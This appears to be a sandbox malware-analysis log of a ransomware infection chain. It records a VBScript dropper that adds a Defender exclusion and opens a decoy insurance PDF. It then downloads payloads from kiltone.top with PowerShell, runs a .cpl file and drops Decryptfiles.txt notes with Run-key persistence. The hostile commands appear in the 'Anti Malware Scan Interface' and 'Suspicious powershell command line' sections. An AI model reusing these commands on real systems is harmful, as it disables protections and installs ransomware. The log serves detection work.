Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: mrmcorer.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: efswrt.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: oleacc.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\notepad.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Google Drive.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe

File written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: Z:\scvhost\Release\scvhost.pdb source: eryy65ty.exe, 00000020.00000000.1772450953.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 00000028.00000000.1925547868.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 0000002B.00000000.2010314184.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe.29.dr
Source:	Binary string: Z:\lderd\Release\lderd.pdb source: fjeljies.cpl.13.dr
Source:	Binary string: Z:\scvhost\Release\scvhost.pdbd source: eryy65ty.exe, 00000020.00000000.1772450953.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 00000028.00000000.1925547868.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 0000002B.00000000.2010314184.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe.29.dr

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData", "0", "true");IWshShell3.ExpandEnvironmentStrings("%temp%");IWshShell3.Run("powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData", "0", "true");IWshShell3.Run("cmd /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0", "0", "true");IWshShell3.ExpandEnvironmentStrings("%temp%");IWshShell3.Run("powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData", "0", "true");IWshShell3.Run("cmd /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.", "0", "true");IWshShell3.ExpandEnvironmentStrings("%temp%");IWshShell3.Run("powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData", "0", "true");IWshShell3.Run("cmd /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.", "0", "true");IWshShell3.Run("cmd /c control %temp%/fjeljies.cpl", "0", "true")

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\fjeljies.cpl			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\fjeljies.cpl	Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: Chrome Cache Entry: 585
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: Chrome Cache Entry: 585	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Decryptfiles.txt

Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XPSUDTARW
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XPSUDTARW

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\SoftwareClient Private

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
